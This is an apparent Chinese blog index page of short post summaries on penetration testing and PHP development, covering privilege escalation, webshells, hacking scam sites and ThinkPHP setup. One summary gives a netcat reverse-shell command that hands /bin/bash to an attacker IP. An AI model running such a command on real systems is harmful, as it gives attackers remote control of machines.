上一页 1 ··· 17 18 19 20 21 22 23 24 25 ··· 139 下一页
摘要: https://bypass007.github.io/Emergency-Response-Notes/ openssl后门可以试试看 https://bypass007.github.io/Emergency-Response-Notes/privilege/%E7%AC%AC4%E7%AF%8 阅读全文
posted @ 2022-06-01 18:05 katago 阅读(81) 评论(0) 推荐(0)
摘要: https://knightyun.github.io/2021/09/04/exploit-take-down-swindle-website https://knightyun.github.io/2021/12/06/exploit-penetrate-bocai-website 阅读全文
posted @ 2022-06-01 16:48 katago 阅读(31) 评论(0) 推荐(0)
摘要: LinPEAS - Linux Privilege Escalation Awesome Script linxu 提权脚本 https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS 直接使用: CVEs Check Vulnerable 阅读全文
posted @ 2022-05-31 17:27 katago 阅读(2232) 评论(0) 推荐(0)
摘要: https://xz.aliyun.com/t/9488 攻击机开启本地监听: netcat -lvvp 2333 目标机主动连接攻击机: netcat 47.xxx.xxx.187 2333 -e /bin/bash # nc <攻击机IP> <攻击机监听的端口> -e /bin/bash bas 阅读全文
posted @ 2022-05-31 17:01 katago 阅读(88) 评论(0) 推荐(0)
摘要: https://www.freebuf.com/sectool/247104.html https://github.com/BeichenDream/Godzilla Web shell 与 冰蝎、蚁剑、哥斯拉(新手必看) https://blog.csdn.net/weixin_54161921 阅读全文
posted @ 2022-05-31 16:17 katago 阅读(671) 评论(0) 推荐(1)
摘要: https://www.kancloud.cn/a173512/thinkphp6/2452937 数据库配置 config\database.php 文件里面 // 服务器地址 'hostname' => env('database.hostname', '127.0.0.1'), // 数据库名 阅读全文
posted @ 2022-05-23 17:47 katago 阅读(104) 评论(0) 推荐(0)
摘要: https://www.kancloud.cn/a173512/thinkphp6/2452918 安装视图 cd /var/www/html/tp6 composer require topthink/think-view 模板位置 模板渲染 name: {$name} <br> email: { 阅读全文
posted @ 2022-05-23 17:20 katago 阅读(53) 评论(0) 推荐(0)
摘要: https://www.kancloud.cn/manual/thinkphp6_0 架构:https://www.kancloud.cn/manual/thinkphp6_0/1037486 ThinkPHP支持传统的MVC 控制器 URL设计 控制器的修改: https://www.bilibi 阅读全文
posted @ 2022-05-23 16:26 katago 阅读(178) 评论(0) 推荐(0)
摘要: 一、安装Lamp环境所需应用(apache、mysql、php) 创建项目 sudo chmod -R 777 /var/www/html cd /var/www/html composer create-project topthink/think tp6 启动项目(测试) php think r 阅读全文
posted @ 2022-05-23 13:48 katago 阅读(240) 评论(0) 推荐(0)
摘要: 用chrome插件实现cookie同步 https://blog.csdn.net/u013613428/article/details/93192961 写一个chrome插件来实现网站的自动登录 https://juejin.cn/post/6844903501965819918 https:/ 阅读全文
posted @ 2022-05-20 16:14 katago 阅读(43) 评论(0) 推荐(0)
上一页 1 ··· 17 18 19 20 21 22 23 24 25 ··· 139 下一页